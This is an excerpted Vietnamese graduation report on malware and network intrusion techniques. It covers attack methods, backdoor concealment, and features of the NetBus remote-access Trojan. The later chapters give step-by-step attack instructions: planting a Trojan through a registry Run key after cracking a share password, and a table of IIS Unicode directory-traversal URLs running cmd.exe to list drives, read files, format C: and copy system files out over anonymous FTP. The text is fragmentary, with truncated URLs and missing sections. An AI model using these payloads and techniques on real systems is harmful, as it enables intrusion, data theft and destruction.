Báo cáo tốt nghiệp
Tìm hiểu phần mềm phá hoại
và các giải pháp xâm nhập
mạng dùng riêng có kết nối
Internet
Tìm hiểu phần mềm phá hoại và các giải pháp xâm nhập mạng dùng riêng có kết nối
Internet
MỤC LỤC
KẾT LUẬN 29
Sinh viên:Vũ Thị Thu Hằng - Lớp CT 702 - Trường ĐH DLHP
2
Tìm hiểu phần mềm phá hoại và các giải pháp xâm nhập mạng dùng riêng có kết nối
Internet
Lời mở đầu
Mục tiêu của việc người ta nối mạng là để nhiều người có thể dùng chung
tài nguyên từ những vị trí địa lý khác nhau, chính vì thế mà các tài nguyên sẽ rất
phân tán, dẫn đến một diều tất yếu là dễ bị xâm phạm gây mất mát dữ liệu,
thông tin.
Càng giao thiệp rộng thì càng dễ bị tấn công, đó là quy luật.
Mọi nguy cơ trên mạng đều có thể nguy hiểm: Một lỗi nhỏ của các hệ
thống sẽ được lợi dụng với tần suất cao, lỗi lớn thì thiệt hại lớn ngay lập tức,
tóm lại trên một quy mô rộng lớn như Internet thì mọi khe hở hay lỗi hệ thống
đều có nguy cơ gây ra thiệt hại như nhau.
Theo CERT (Computer Emegency Response Team):
1989: có 200 vụ tấn công, truy nhập trái phép trên mạng được báo cáo.
1991: 400 vụ.
1993: 1400vụ.
1994: 2241 vụ.
1998: 3734 vụ.
1999: 9589 vụ
2000: 21756 vụ

Sinh viên
Vũ Thị Thu Hằng
Sinh viên:Vũ Thị Thu Hằng - Lớp CT 702 - Trường ĐH DLHP
4
Tìm hiểu phần mềm phá hoại và các giải pháp xâm nhập mạng dùng riêng có kết nối
Internet
Chương 1 MỘT SỐ PHƯƠNG PHÁP
TẤN CÔNG VÀ KỸ THUẬT XÂM NHẬP MẠNG
1.1 Thực trạng tấn công của tội phạm trên mạng
Với sự phát triển mạnh mẽ và sự ảnh hưởng rộng rãi của Internet khiến
cho mạng máy tính sinh ra một tầng lớp mới - những tay hacker (là những người
có niềm đam mê rất lớn đối với máy tính,với công nghệ thông tin). Hacker được
chia làm hai phái: hacker “mũ trắng”(white-hat hacker) và hacker “mũ đen”
(black-hat hacker).
Phần lớn các cuộc tấn công trên mạng được thực hiện thông qua việc sử
dụng một hoặc nhiều công cụ phần mềm. Trong đồ án này em nghiên cứu các
phần mềm phá hoại. Phần mềm phá hoại là những phần mềm được thiết kế, xây
dựng nhằm mục đích tấn công gây tổn thất hay chiếm dụng bất hợp pháp tài
nguyên của máy tính mục tiêu( máy tinh bị tấn công ). Những phần mềm này
thường được che dấu hay ngụy trang như là phần mềm hợp lệ, công khai hoặc
bí mật thâm nhập vào máy tính mục tiêu. Những phần mềm phá hoại khác nhau
có phương thức và nguy cơ gây hại khác nhau.
Các vụ tấn công trên mạng ngày càng gia tăng cả về quy mô và tính chất
nguy hiểm.
Trong tương lai, những kẻ viết virus có thể gia tăng khả năng điều khiển
lên virus của mình sau khi đã phát tán chúng trên mạng. Ngày càng nhiều sâu
máy tính có chứa backdoor và tác giả của chúng có thể “nâng cấp” một cách
trực tiếp để vượt qua các phần mềm diệt virus hay bổ sung thêm tính năng. Hơn
nữa, sâu máy tính còn có khả năng tự thiết lập các kênh liên lạc riêng giữa chúng
để tập hợp lại và nâng cấp. Điều này không chỉ giúp chúng tránh khỏi sự phát

chức lẫn các giải pháp công nghệ. Một số phương pháp tấn công và kỹ thuật
xâm nhập mạng quan trọng như sau:
1.2 Các phương pháp tấn công
1.2.1 Tấn công trực tiếp
Sinh viên:Vũ Thị Thu Hằng - Lớp CT 702 - Trường ĐH DLHP
6
Tìm hiểu phần mềm phá hoại và các giải pháp xâm nhập mạng dùng riêng có kết nối
Internet
1.2.2 Nghe trộm
1.2.3 Giả mạo địa chỉ
Hai dạng tấn công dựa trên việc giả mạo địa chỉ là:
- Giả mạo địa chỉ máy gửi (Source addres).
- Kẻ trung gian (Man in the middle).
1.2.4 Vô hiệu hoá các chức năng của hệ thống mục tiêu
- Từ chối dịch vụ (DOS – Denial of Service).
- Từ chối dịch vụ mạng (Network denial of service).
1.2.5 Sử dụng lỗi của người quản trị hệ thống
1.3 Các kỹ thuật xâm nhập mạng
1.3.1 Rình mò (Snooping)
1.3.2 Đánh lừa (Spoofing)
1.3.3 Điệp viên (Agent)
Chương 2. MỘT SỐ NGUYÊN TẮC TẤN CÔNG TRÊN MẠNG
2.1 Phát hiện điểm yếu trong cơ chế bảo mật của đối phương.
Muốn thực hiện tấn công thành công một mục tiêu phải tìm hiểu, nghiên
cứu rất kỹ mục tiêu đó. Một hệ thống đảm bảo an ninh an toàn máy tính thường
bao gồm một số yếu tố chính sau đây:
- Yếu tố tổ chức.
- Yếu tố kỹ thuật, công nghệ.
Mục đích của công tác dò tìm mục tiêu là bằng các biện pháp khác nhau
để phát hiện những điểm yếu trong hệ thống bảo mật (về mặt tổ chức và kỹ thuật

từ xa (RAT Remote Administrastor Tool). Như vậy một Backdoor điển hình
gồm hai thành phần:
♦ Thành phần Server nằm trên máy đích.
Sinh viên:Vũ Thị Thu Hằng - Lớp CT 702 - Trường ĐH DLHP
8
Tìm hiểu phần mềm phá hoại và các giải pháp xâm nhập mạng dùng riêng có kết nối
Internet
♦ Thành phần Client nằm trên máy tấn công
Tấn công bằng Backdoor cần đặc biệt chú ý hai vấn đề:
♦ Backdoor mạnh phải có thành phần Server nhỏ, gọn, có khả năng thực thi
nhiều chức năng với tốc độ cao để tránh gây nghi ngờ.
♦ Server cần có khả năng ngụy trang ẩn nấp kín đáo để không bị phát hiện.
Có vài giải pháp thông dụng để thực hiện:
♦ Thiết kế Backdoor có chức năng sửa những tham số dòng lệnh của chính
nó để khi chạy mang một tên (hợp lệ) khác.
♦ Backdoor có chức năng sửa một số thường trình trong các thư viện hệ
thống để nó không thực hiện mọi tiến trình đang thực thi, trong đó có tiến
trình của Backdoor server.
♦ Backdoor được gắn với thường trình điều khiển ngắt khiến nó không hiện
trong bảng tiến trình.
♦ Người tấn công có thể sửa nhân hệ điều hành đích để ẩn đi những tiến
trình nhất định (trong trường hợp này là tiến trình Backdoor server).
Chức năng của một Backdoor được qui định trong thành phần server. Các chức
năng thường gặp là:
♦ Keylogging (bắt trộm phím).
♦ Screen capturing (chụp ảnh màn hình).
Sinh viên:Vũ Thị Thu Hằng - Lớp CT 702 - Trường ĐH DLHP

quá trình thực hiện tấn công trên mạng. Các công cụ thường được sử dụng để
đơn giản hóa những tác vụ nhất định trong quá trình chung nhằm nâng cao tốc
độ, đảm bảo hiệu quả công việc tấn công.
Từ các công cụ do chính hệ điều hành cung cấp tới những công cụ do
hãng thứ hai, các nhóm chuyên về bảo mật, các hacker hoặc các tổ chức hacker
quảng bá, tất cả đều có thể sử dụng vào cuộc tấn công, miễn là cách khai thác
hợp lý, kết hợp các công cụ một cách hiệu quả.
Cách sử dụng các công cụ để cấy Trojan lên một máy khác thông qua chia sẻ
tài nguyên trên máy đó. Người ta muốn có một tài liệu quan trọng được lưu ở ổ đĩa
Sinh viên:Vũ Thị Thu Hằng - Lớp CT 702 - Trường ĐH DLHP
10
Tìm hiểu phần mềm phá hoại và các giải pháp xâm nhập mạng dùng riêng có kết nối
Internet
D: và không share full ổ đĩa C: ở máy mục tiêu. Tuy nhiên, để thực hiện trao đổi
thông tin với các máy khác, ổ đĩa C: được share với mật khẩu, mật khẩu này được
thay đổi thường xuyên. Có thể chiếm đoạt các văn bản trên bằng cách trước tiên sử
dụng một công cụ bẻ khóa chia sẻ Passware Kit
().
Công cụ này bẻ khóa làm việc rất nhanh và hiệu quả, trong phần lớn trường hợp
nó sẽ tìm ra mật khẩu chia sẻ tài nguyên trong vòng một vài phút tùy thuộc vào
độ phức tạp của mật khẩu.
Sau đó, ta chỉ việc copy file server của Netbus 1.7 (patch.exe) vào thư
mục bất kỳ ở ổ C:, giả sử C:\windows\. Tiếp theo để kích hoạt Netbus, ta phải
dùng đến dịch vụ Remote Registry Service của Windows để sửa đổi Registry
máy đích làm cho file patch.exe tự đông chạy từ lần khởi động tiếp theo. Khi
dịch vụ này được cài đặt trên máy đích, ta có thể sử dụng regedit.exe của
Windows để nạp và sửa đổi Registry máy đó. Thêm vào đó một khóa ở
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current\Version\Run hoặc
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current\Version\Run để
chạy patch.exe: Value type: String

15 Microsoft Powerpoint 5
Hình 2.3.1: Danh sách một số phần mềm nhiều lỗ hổng bảo mật nhất
(Nguồn: www.securityfocus.com tháng 11/2001)
Trong đồ án này em xin trình bày cụ thể phương pháp tấn công IIS server
bằng cách lợi dụng lỗi Unicode: Có thể xem nội dung ổ đĩa C: trên đó cài IIS
server 5.0 bằng URL sau khi gõ ở thanh address của trình duyệt, giả thiết rằng
địa chỉ trang web đó là , mặc dù vẫn có một thông
báo lỗi CGI:
%c1%1c /winnt/system32/cmd.exe?/c+dir+c:\

Cũng như rất nhiều loại web server trước đây như Compaq insight
Manager 4.x, MS Index Server 2.0, HP JetAdmin 5.6,… IIS server bị mắc một
lỗi gọi là “dot dot directory traversal attack” (tấn công bằng cách lần ngược thư
mục do lỗi “dot dot”). Khi một trong các loại server trên nhận một xâu URL có
chứa các xâu con “ /” (hoặc “ \” tùy loại server) thì mỗi xâu con này chuyển
đường dẫn hiện thời ở server lên mức cha của nó (tương đương với câu lệnh
“cd ” của DOS) và dần dần ra ngoài thư mục web - điều này vốn không hợp lệ.
Sinh viên:Vũ Thị Thu Hằng - Lớp CT 702 - Trường ĐH DLHP
12
Tìm hiểu phần mềm phá hoại và các giải pháp xâm nhập mạng dùng riêng có kết nối
Internet
Kết hợp với một đường dẫn thích hợp phía cuối URL, nó cho phép người tấn
công thực thi lệnh nào đó trên máy chủ web. IIS server và một số web server sửa
lỗi bằng cách kiểm tra URL ở thanh địa chỉ của trình duyệt và từ chối, không
cho phép thực thi nếu như trong đó chứa xâu con “ /” hay “ \”.
Tuy vậy, hacker đã sáng tạo ra thủ thuật dùng unicode để lọt qua chế độ
phòng vệ này. Chuẩn unicode từ Ver. 2.0 trở lên cho phép một ký tự có nhiều
mã hóa khác nhau, đây chính là nơi để lợi dụng.
Cách mã hóa như vậy được gọi là mã hóa unicode rất dài (unicode very
long representation). Khi nhận một URL, một server tốt phải ngăn chặn các cách

định (winnt/system32/cmd.exe) và thực hiện lệnh “dir C:\” liệt kê nội dung ổ đĩa C:.
Do có nhiều cách biểu diễn dạng Unicode rất dài của ký tự “/” và “\”
cũng như có khá nhiều thiết lập ngầm định khi cài đặt Windows NT và IIS nên
tổ hợp chúng lại sẽ tạo nên nhiều URL khác nhau dùng để xâm nhập. Bảng dưới
đây liệt kê một số URL phổ biến:
STT URL
1 /scripts/ %0%af /winnt/system32/cmd.exe?/c+
2 /scripts/ %c1%9c /winnt/system32/cmd.exe?/c+
3 /scripts/ %c1%fc /winnt/system32/cmd.exe?/c+
4 /scripts/ %c0%9c /winnt/system32/cmd.exe?/c+
5 /scripts/ %c0%9f /winnt/system32/cmd.exe?/c+
6 /scripts/ %c1%9a /winnt/system32/cmd.exe?/c+
7 /scripts/ %c1%1c /winnt/system32/cmd.exe?/c+
8 /scripts/ %c1%af /winnt/system32/cmd.exe?/c+
9 /scripts/ %e0%af /winnt/system32/cmd.exe?/c+
Hình 2.3.2. Một số URL dùng khai thác lỗi Unicode trên IIS
Bằng cách trên, người ta đang nắm rất nhiều quyền đối với hệ thống.
Người ta có thể xem nội dung đĩa, nội dung một số file quan trọng, xóa dữ liệu
trên đĩa cững và thậm chí format lại ổ đĩa chỉ bằng các lệnh của DOS. Tiếp tục sử
dụng URL trên, để xem nội dung một file, giả sử autoexec.bat ta gõ ở trình duyệt:

%c1%1c /winnt/system32/cmd.exe?/c+type+c:\autoexec .bat
Để format lại ổ đĩa C:, ta gõ:
Sinh viên:Vũ Thị Thu Hằng - Lớp CT 702 - Trường ĐH DLHP
14
Tìm hiểu phần mềm phá hoại và các giải pháp xâm nhập mạng dùng riêng có kết nối
Internet

%c1%1c /winnt/system32/cmd.exe?/c+format+c:\+/q
Ta cũng có thể chiếm quyền ghi đĩa và thực hiện sửa đổi, tạo mới file

cập các trang web hoặc .
Ngoài ra, có thể sử dụng một số chương trình nhằm tạo ra các proxy ảo
ngay trên máy của mình. Một chương trình tiêu biểu trong số đó là chương trình
Anomity 4 proxy.
2.6 Nguyên tắc phối hợp tấn công
Trong quá trình thực hiện tấn công, tuỳ theo đối tượng tấn công và công
cụ có trong tay, người ta có thể sử dụng nhiều biện pháp khác nhau, theo các
trình tự khác nhau để đạt được kết quả cao nhất. Sơ đồ sau thể hiện thứ tự điển
hình của việc áp dụng các nguyên lý đã trình bày vào việc thực hiện một cuộc
tấn công cụ thể:
Sinh viên:Vũ Thị Thu Hằng - Lớp CT 702 - Trường ĐH DLHP
16
Hình 3.5.1: Mô hình giao tiếp giữa hai máy thông qua proxy.
Máy của ta Proxy Máy đối
phương
Gửi yêu cầu
Trả lời
Gửi yêu cầu
Trả lời
Khám phá điểm yếu, lỗ hổng
bảo mật trong hệ thống mục tiêu
Sử dụng các công cụ để khai
thác các điểm yếu của hệ thống
mục tiêu
Tiến hành các biện pháp tấn
công, thu thập thông tin
Tạo đường ngầm (cửa sau),
cài cắm “điệp viên” nếu có thể
Xóa dấu vết
Ngụy trang


7. Xem màn hình máy server – Screendump
8. Xem thông tin máy mục tiêu – Get info
Sinh viên:Vũ Thị Thu Hằng - Lớp CT 702 - Trường ĐH DLHP
18
Tìm hiểu phần mềm phá hoại và các giải pháp xâm nhập mạng dùng riêng có kết nối
Internet9. Chạy file nhạc – Play sound

10. Điều khiển máy mục tiêu – Exit windows

11.Gửi thông báo – Send texts
12. Kích hoạt/Đóng cửa sổ - Active windows

13. Đặt vị trí con trỏ chuột – Mouse pos
14. Nhận phím nhập vào của người dùng trên máy mục tiêu – Listen
Sinh viên:Vũ Thị Thu Hằng - Lớp CT 702 - Trường ĐH DLHP
19
Tìm hiểu phần mềm phá hoại và các giải pháp xâm nhập mạng dùng riêng có kết nối
Internet

15. Ghi âm thanh từ máy mục tiêu – Sound system.
16. Điều khiển chuột - Control mouse
17. Mở một trang Web – Go to URL
18. Điều khiển bàn phím – Key Manage

- Chọn Disable keys để nhập vào các phím cần vô hiệu hóa, khi đó sẽ xuất
hiện cửa sổ sau:

thông tin trên các mạng, các host, user của bất cứ tổ chức nào đã đăng ký với
NIC.
LDAP truy vấn những thư mục mà sử dụng chuẩn LDAP trên Internet.
Rất nhiều tổ chức sử dụng LDAP để tạo nên thông tin về user (như các tên và
địa chỉ thư điện tử) có thể trên Internet và Intranet của họ.
Quote đưa ra những trích dẫn từ Quote server.
Scan tìm kiếm một mạng cụ thể và liệt kê các host dùng TCP/IP mà nó
tìm thấy. Scan cũng có thể xác định các dịch vụ (như FTP, HTTP) trên mỗi host
và liệt kê những cổng hoạt động trên mỗi host. Scan có thể đưa ra một tóm lược
nhanh chóng về cái gì trên mạng của bạn và dịch vụ mạng nào đang chạy.
SNMP truy vấn những giá trị trên những thiết bị thực hiện giao thức quản
lý mạng đơn giản (Simple Network Management Protocol). SNMP có thể cung
cấp một cái nhìn gần nhất về các host và các thiết bị trên mạng của bạn bởi việc
cung cấp thông tin trạng thái và cấu hình về hệ thống hiện thời.
WinNet quét mạng cục bộ của bạn và liệt kê các thiết bị mạng Microsoft
Windows và các nguồn tài nguyên chia sẻ.
Throughput kiểm tra tốc độ truyền dữ liệu gữa máy tính của bạn và máy
tính từ xa.
About hiển thị thông tin mạng về máy tính cục bộ của bạn và mạng cục
bộ của bạn, cũng như thông tin về WS_Ping ProPack.
Sinh viên:Vũ Thị Thu Hằng - Lớp CT 702 - Trường ĐH DLHP
22
Tìm hiểu phần mềm phá hoại và các giải pháp xâm nhập mạng dùng riêng có kết nối
Internet
Chương 4. MỘT SỐ GIẢI PHÁP CỤ THỂ TẤN CÔNG
TRÊN MẠNG MÁY TÍNH
4.1 TẤN CÔNG MÁY MỤC TIÊU BẰNG CÁCH GIÀNH QUYỀN ĐIỀU
KHIỂN HỆ THỐNG ĐÓ.
Để nắm quyền điểu khiển server, người ta phải chiếm được quyền download và
upload file. Muốn thực hiện điều này, ta cấn tìm hiểu trước hết về một số giao thức sử

NetBEUI ( NetBIOS Extended User Interface - giao diện người dùng mở rộng
trong NetBIOS )” và NetBIOS over TCP/IP. Như vậy, NetBIOS cung cấp các
ứng dụng và giao diện lập trình cho các dịch vụ chia sẻ tài nguyên thông qua
một số giao thức cấp thấp hơn, bao gồm cả giao thức TCP/IP.
Vì giao thức “NetBIOS over TCP/IP” chạy trên họ giao thức TCP/IP – là
họ giao thức chuẩn trên Internet, người ta có thể chia sẻ tài nguyên ngay cả trên
Internet. Nếu máy đích người ta định tấn công cài đặt giao thức “NetBIOS over
TCP/IP”. Ta có thể lợi dụng điều này tấn công, nhất là khi đã khai thác được lỗi
unicode trên hệ thống đó.
Bây giờ người ta sẽ đi vào cụ thể, tìm cách download và upload file trên
IIS mắc lỗi Unicode.
Theo ngầm định, khi cài IIS phiên bản từ 4.0 trở lên, một FTP server sẽ
được tự động cài đặt vào hệ thống. FTP server cho phép người sử dụng vô danh
truy cập vào thư mục \inetpub\ftoproot\ và download các file từ đó (nhưng
không cho phép upload file). Lợi dụng điều này, để download một file nào đó
trên máy đích mắc lỗi unicode, ta thực hiện hai bước sau:
+ Bước 1: Copy file download (giả sử là file c:\system.ini) vào thư mục
\inetpub\ftoproot\ bằng URL:
%c1%1c /winnt/system32/cmd.exe?/c+copy+c:\system.ini+c:\inetpub\ftoproot\
+ Bước 2: Sử dụng FTP vô danh đăng nhập vào máy tính đích download
file system.ini về.
Sinh viên:Vũ Thị Thu Hằng - Lớp CT 702 - Trường ĐH DLHP
24
Tìm hiểu phần mềm phá hoại và các giải pháp xâm nhập mạng dùng riêng có kết nối
Internet
Kết hợp với lệnh dir đã trình bày ở trên (Mục 3.4), phương pháp này cho
phép ta lấy được hầu hết file quan trọng trên server bị tấn công, đây có thể nói là
một thành công lớn đối với người tấn công. Tuy nhiên phương pháp này bị hạn
chế ở chỗ nó không cho phép download tất cả các file. Cụ thể, người ta biết rằng
Windows NT và Windows 2000 lưu trữ một bản sao file SAM (Security